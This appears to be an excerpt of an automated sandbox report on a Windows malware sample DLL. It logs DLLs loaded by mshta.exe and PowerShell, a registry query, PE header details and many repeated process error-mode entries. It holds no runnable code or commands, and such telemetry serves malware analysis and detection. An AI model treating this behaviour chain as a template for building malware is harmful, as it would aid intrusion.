Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wininet.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: pcacli.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13313.26301.dllStatic PE information: Image base 0x27b030000 > 0x60000000
Source: SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13313.26301.dllStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Source: SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13313.26301.dllStatic PE information: section name: .xdata
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
